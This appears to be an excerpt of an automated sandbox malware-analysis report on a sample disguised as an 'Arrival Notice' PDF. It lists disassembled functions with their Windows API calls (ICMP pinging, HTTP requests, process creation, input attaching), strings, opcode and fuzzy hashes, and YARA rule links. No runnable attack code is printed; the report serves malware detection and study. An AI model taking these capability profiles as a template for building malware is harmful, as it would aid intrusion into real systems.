Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 834269672-1287834457
Opcode ID: 2f4673b29a39ee453621d8900002e3f521db386d62cc08ab04332ab863c1612a
Instruction ID: db5a11641b38f52abfc69ee9b0774f077ee421c0375d1f735c2fd791e4c19852
Opcode Fuzzy Hash: 2f4673b29a39ee453621d8900002e3f521db386d62cc08ab04332ab863c1612a
Instruction Fuzzy Hash: D461AC71228302AFDB11EF54D848B6ABBE8AF85714F00452DF9859B291C771ED64CBD3

Function 00298107 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00298168
inet_addr.WSOCK32(?,?,?), ref: 002981AD
gethostbyname.WSOCK32(?), ref: 002981B9
IcmpCreateFile.IPHLPAPI ref: 002981C7
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00298237
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 0029824D
IcmpCloseHandle.IPHLPAPI(00000000), ref: 002982C2
WSACleanup.WSOCK32 ref: 002982C8

Strings

Ping, xrefs: 002981EB

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: 8747c3eadf5055b12a2de62b724d761f61580f4d1988ed7abc2b95c5b3ef269e
Instruction ID: 7f9dff27c3bae37ac21b0a75b4c85c54952f7236375a11bc730de971a0008997
Opcode Fuzzy Hash: 8747c3eadf5055b12a2de62b724d761f61580f4d1988ed7abc2b95c5b3ef269e
Instruction Fuzzy Hash: E55192316246019FDB10EF24DC49B2AB7E4AF46710F18892AFE5ADB2A1DB70E915CF41

Function 0028E389 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 97COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0028E396
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0028E40C
GetLastError.KERNEL32 ref: 0028E416
SetErrorMode.KERNEL32(00000000,READY), ref: 0028E483

Strings

NOTREADY, xrefs: 0028E442
INVALID, xrefs: 0028E455
READY, xrefs: 0028E45C
READONLY, xrefs: 0028E44E
UNKNOWN, xrefs: 0028E43B

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: f243ffe5f384fb78b8dc201130ddc04521fa2c58890d2781a1cdc43fde6ca83d
Instruction ID: ac98f35d41dde664dfeba0ff672970ba9e42e7489ee51eb8d505df8d9c67d03f
Opcode Fuzzy Hash: f243ffe5f384fb78b8dc201130ddc04521fa2c58890d2781a1cdc43fde6ca83d
Instruction Fuzzy Hash: FC319439A2120A9FDB01FF68D849EBDB7B4EF05304F158026E509A72D2D7B09911CB51

Function 0027B907 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 0027B98C
GetDlgCtrlID.USER32 ref: 0027B997
GetParent.USER32 ref: 0027B9B3
SendMessageW.USER32(00000000,?,00000111,?), ref: 0027B9B6
GetDlgCtrlID.USER32(?), ref: 0027B9BF
GetParent.USER32(?), ref: 0027B9DB
SendMessageW.USER32(00000000,?,?,00000111), ref: 0027B9DE

Strings

ComboBox, xrefs: 0027B911
ListBox, xrefs: 0027B949

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: MessageSend$CtrlParent
String ID: ComboBox$ListBox
API String ID: 1383977212-1403004172
Opcode ID: 61a1bfab0463bcfa1b118a0a7e75effa5bcbbe3a95ddb3245e90a80b62703f80
Instruction ID: 0c4c7936fff784df78fa822f0326bba92eeafbfa656bcf419df359ba5cfa9a42
Opcode Fuzzy Hash: 61a1bfab0463bcfa1b118a0a7e75effa5bcbbe3a95ddb3245e90a80b62703f80
Instruction Fuzzy Hash: A121A475A10108AFDB05AFA4DC85EBEBB79EF45310B204115F665932A1DBB45825DF20

Function 0027B9F0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 80windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000186,00000002,00000000), ref: 0027BA73
GetDlgCtrlID.USER32 ref: 0027BA7E
GetParent.USER32 ref: 0027BA9A
SendMessageW.USER32(00000000,?,00000111,?), ref: 0027BA9D
GetDlgCtrlID.USER32(?), ref: 0027BAA6
GetParent.USER32(?), ref: 0027BAC2
SendMessageW.USER32(00000000,?,?,00000111), ref: 0027BAC5

Strings

ComboBox, xrefs: 0027B9FA
ListBox, xrefs: 0027BA32

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: MessageSend$CtrlParent
String ID: ComboBox$ListBox
API String ID: 1383977212-1403004172
Opcode ID: 4fd44f21c848a45bf382ef126d82daa683aeb6e649d3fdfb8d746556661faa86
Instruction ID: 0cd2ff72cf708986eeab8253448bf74e863efaf6327eb9bd9bafe7a0cdc57d42
Opcode Fuzzy Hash: 4fd44f21c848a45bf382ef126d82daa683aeb6e649d3fdfb8d746556661faa86
Instruction Fuzzy Hash: 1821AFB4A10108BBDB05AFA4DC85EBEBB79EF45300F204025F955A32A1DBB5592ADF20

Function 0027BAD7 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 71windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 0027BAE3
GetClassNameW.USER32(00000000,?,00000100), ref: 0027BAF8
_wcscmp.LIBCMT ref: 0027BB0A
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0027BB85

Strings

list, xrefs: 0027BB67
smallicons, xrefs: 0027BB4D
details, xrefs: 0027BB33
largeicons, xrefs: 0027BB19
SHELLDLL_DefView, xrefs: 0027BB04

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: ClassMessageNameParentSend_wcscmp
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1704125052-3381328864
Opcode ID: 15d4fd64408a1bc1dd8b11a3d6942c0d0db877f42033aae3e7fe2b15496b4890
Instruction ID: 06663367ab5c4a9e9a6b1908e12fe5b7e4f878c56630af124f6a7b6d13d6f8f1
Opcode Fuzzy Hash: 15d4fd64408a1bc1dd8b11a3d6942c0d0db877f42033aae3e7fe2b15496b4890
Instruction Fuzzy Hash: C411EB76668307F9FA116A21AC06EA6775C9B12368B204022FE08E54D9EFB168715554

Function 0029B2A9 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0029B2D5
CoInitialize.OLE32(00000000), ref: 0029B302
CoUninitialize.OLE32 ref: 0029B30C
GetRunningObjectTable.OLE32(00000000,?), ref: 0029B40C
SetErrorMode.KERNEL32(00000001,00000029), ref: 0029B539
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 0029B56D
CoGetObject.OLE32(?,00000000,002CD91C,?), ref: 0029B590
SetErrorMode.KERNEL32(00000000), ref: 0029B5A3
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0029B623
VariantClear.OLEAUT32(002CD91C), ref: 0029B633

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
String ID:
API String ID: 2395222682-0
Opcode ID: 5353d5d03de00c6cd16b2c3f0b6d178e83cf70b6c5e768a3d034e7c6c06f7fa4
Instruction ID: 8c6207fe89206183dd65739c22819a3e1f0060218d431615959e2fa6c464e5e6
Opcode Fuzzy Hash: 5353d5d03de00c6cd16b2c3f0b6d178e83cf70b6c5e768a3d034e7c6c06f7fa4
Instruction Fuzzy Hash: A5C13271618301AFDB05DF68D984A2BB7E9FF88308F00496DF98A9B251DB70ED15CB52

Function 0026ACB3 Relevance: 15.2, APIs: 10, Instructions: 219COMMON

Download Yara Rule

APIs

__lock.LIBCMT ref: 0026ACC1

Part of subcall function 00267CF4: __mtinitlocknum.LIBCMT ref: 00267D06
Part of subcall function 00267CF4: EnterCriticalSection.KERNEL32(00000000,?,00267ADD,0000000D), ref: 00267D1F

__calloc_crt.LIBCMT ref: 0026ACD2

Part of subcall function 00266986: __calloc_impl.LIBCMT ref: 00266995
Part of subcall function 00266986: Sleep.KERNEL32(00000000,000003BC,0025F507,?,0000000E), ref: 002669AC

@_EH4_CallFilterFunc@8.LIBCMT ref: 0026ACED
GetStartupInfoW.KERNEL32(?,002F6E28,00000064,00265E91,002F6C70,00000014), ref: 0026AD46
__calloc_crt.LIBCMT ref: 0026AD91
GetFileType.KERNEL32(00000001), ref: 0026ADD8
InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 0026AE11

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
String ID:
API String ID: 1426640281-0
Opcode ID: f0ebca9829b788a718109db16db14d18cb58c9944a63758101b43449a1e3b880
Instruction ID: 7c05939864de2ad8afad226d944591634acf644c5ac76d3bfc3a8e5b33495491
Opcode Fuzzy Hash: f0ebca9829b788a718109db16db14d18cb58c9944a63758101b43449a1e3b880
Instruction Fuzzy Hash: E081E2709263468FDB14CF68C8845A9BBF4AF05324F24426ED4A6BB3D1C7359892CF56

Function 00284025 Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00284047
GetForegroundWindow.USER32(00000000,?,?,?,?,?,002830A5,?,00000001), ref: 0028405B
GetWindowThreadProcessId.USER32(00000000), ref: 00284062
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,002830A5,?,00000001), ref: 00284071
GetWindowThreadProcessId.USER32(?,00000000), ref: 00284083
AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,002830A5,?,00000001), ref: 0028409C
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,002830A5,?,00000001), ref: 002840AE
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,002830A5,?,00000001), ref: 002840F3
AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,002830A5,?,00000001), ref: 00284108
AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,002830A5,?,00000001), ref: 00284113

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: c574201a5c02ae96ef44500d4460ab0036ab8aff1efe6da647e81c4d4acd3b78
Instruction ID: a6e40fd65bebddfe64198a706dc225324926778794e77f7b2ffe8858b2141ae9
Opcode Fuzzy Hash: c574201a5c02ae96ef44500d4460ab0036ab8aff1efe6da647e81c4d4acd3b78
Instruction Fuzzy Hash: 0F31C375512206AFEB11FF54EC4DF6AB7ADAB50311F108026F908E62D4DBB4A980CB60

Function 002BDD4A Relevance: 15.1, APIs: 10, Instructions: 59windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 0025B496
SetTextColor.GDI32(?,000000FF), ref: 0025B4A0
SetBkMode.GDI32(?,00000001), ref: 0025B4B5
GetStockObject.GDI32(00000005), ref: 0025B4BD
GetClientRect.USER32(?), ref: 002BDD63
SendMessageW.USER32(?,00001328,00000000,?), ref: 002BDD7A
GetWindowDC.USER32(?), ref: 002BDD86
GetPixel.GDI32(00000000,?,?), ref: 002BDD95
ReleaseDC.USER32(?,00000000), ref: 002BDDA7
GetSysColor.USER32(00000005), ref: 002BDDC5

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
String ID:
API String ID: 3430376129-0
Opcode ID: 340674391d441533834e0335077d9ef2e6235fffede3ceac772542fcc7d3e5f5
Instruction ID: 5164c174876faccbab80e267ab40039b5ed738fc942c766d87d8bcb66e6f33a7
Opcode Fuzzy Hash: 340674391d441533834e0335077d9ef2e6235fffede3ceac772542fcc7d3e5f5
Instruction Fuzzy Hash: 4A117C31510206AFDB216FA4FC0CFE97B65EB04366F648635FA6A950E1CB710951DF20

Function 00243093 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 210COMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 002430DC
CoUninitialize.OLE32(?,00000000), ref: 00243181
UnregisterHotKey.USER32(?), ref: 002432A9
DestroyWindow.USER32(?), ref: 002B5079
FreeLibrary.KERNEL32(?), ref: 002B50F8
VirtualFree.KERNEL32(?,00000000,00008000), ref: 002B5125

Strings

close all, xrefs: 002430D7

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: b84ed353c7bd35765f406741779ae1ec25538458e03d6db114bd7c15004cec6c
Instruction ID: c436d9cdc6f0e03301cb6c7b39651666123a5c0af4b0318998ccfc8b0d4c581d
Opcode Fuzzy Hash: b84ed353c7bd35765f406741779ae1ec25538458e03d6db114bd7c15004cec6c
Instruction Fuzzy Hash: 58912E34621112CFC719EF14D895FA8F3A4FF14344F5442A9E90AAB262DB70AE7ACF54

Function 0025CB8D Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 185windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 0025CC15

Part of subcall function 0025CCCD: GetClientRect.USER32(?,?), ref: 0025CCF6
Part of subcall function 0025CCCD: GetWindowRect.USER32(?,?), ref: 0025CD37
Part of subcall function 0025CCCD: ScreenToClient.USER32(?,?), ref: 0025CD5F

GetDC.USER32 ref: 002BD137
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 002BD14A
SelectObject.GDI32(00000000,00000000), ref: 002BD158
SelectObject.GDI32(00000000,00000000), ref: 002BD16D
ReleaseDC.USER32(?,00000000), ref: 002BD175
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 002BD200

Strings

U, xrefs: 002BD0D5

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: 60da2faafb900d2c3a3eaa2b384889113d7abd28190799a3236d72222ac0e756
Instruction ID: e915237726c7838753557be66bea36bbc805d4d03c5d2155f30aa3fac2bd8649
Opcode Fuzzy Hash: 60da2faafb900d2c3a3eaa2b384889113d7abd28190799a3236d72222ac0e756
Instruction Fuzzy Hash: 68713730420206DFCF21DF28CC80AEA7BB5FF48395F24426AED59562A6E7318C65CF60

Function 002945C4 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 133networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 002945FF
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0029462B
InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 0029466D
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00294682
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0029468F
HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 002946BF
InternetCloseHandle.WININET(00000000), ref: 00294706

Part of subcall function 00295052: GetLastError.KERNEL32(?,?,002943CC,00000000,00000000,00000001), ref: 00295067

Strings

, xrefs: 002946B8

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
String ID:
API String ID: 1241431887-3916222277
Opcode ID: 3145cb8cb84d74f860c8e26cbf489af42f849fc2ffa5b8787c0f4982ca1b7546
Instruction ID: 572aee47687ada6759bb56ef46822a4ac2d8aaa468819b67fd155b1f6c236a2d
Opcode Fuzzy Hash: 3145cb8cb84d74f860c8e26cbf489af42f849fc2ffa5b8787c0f4982ca1b7546
Instruction Fuzzy Hash: E4419DB1510209BFEF02AF90DC89FBB77ACFF09304F00412AFA059A141D7B099668BA4

Function 0029B644 Relevance: 13.9, APIs: 9, Instructions: 432COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,002DDC00), ref: 0029B715
FreeLibrary.KERNEL32(00000000,00000001,00000000,?,002DDC00), ref: 0029B749
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 0029B8C1
SysFreeString.OLEAUT32(?), ref: 0029B8EB

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: Free$FileLibraryModuleNamePathQueryStringType
String ID:
API String ID: 560350794-0
Opcode ID: 0bb329e78c26a3b729f6fcdd3ddcccf6d1931c161be08bc102e3a6ec2812030b
Instruction ID: 1d14ced07dc143a971d5159b79c03f9d2afe9b16350cfcf9224b703c74aeecd0
Opcode Fuzzy Hash: 0bb329e78c26a3b729f6fcdd3ddcccf6d1931c161be08bc102e3a6ec2812030b
Instruction Fuzzy Hash: 6CF14875A20209EFDF05DF94D988EAEB7B9FF89311F108058F905AB250DB71AE51CB90

Function 002A24D4 Relevance: 13.9, APIs: 9, Instructions: 376processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 002A24F5
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 002A2688
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 002A26AC
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 002A26EC
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 002A270E
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 002A286F
GetLastError.KERNEL32(00000000,00000001,00000000), ref: 002A28A1
CloseHandle.KERNEL32(?), ref: 002A28D0
CloseHandle.KERNEL32(?), ref: 002A2947

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
String ID:
API String ID: 4090791747-0
Opcode ID: 0647dcb5debe4b072de6bffdcd2eb22733c9f01fb693613c62f4c44b485fea4c
Instruction ID: 9e742eeae81c91b575339dff3b280418c506b0145aa9a7a6d60cf89440ed491e
Opcode Fuzzy Hash: 0647dcb5debe4b072de6bffdcd2eb22733c9f01fb693613c62f4c44b485fea4c
Instruction Fuzzy Hash: 48D1A131624301DFC718EF28C891A6ABBE5BF85710F14856DF8899B2A2DB31DD58CF52

Function 002AB33A Relevance: 13.7, APIs: 9, Instructions: 167COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 002AB3F4

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
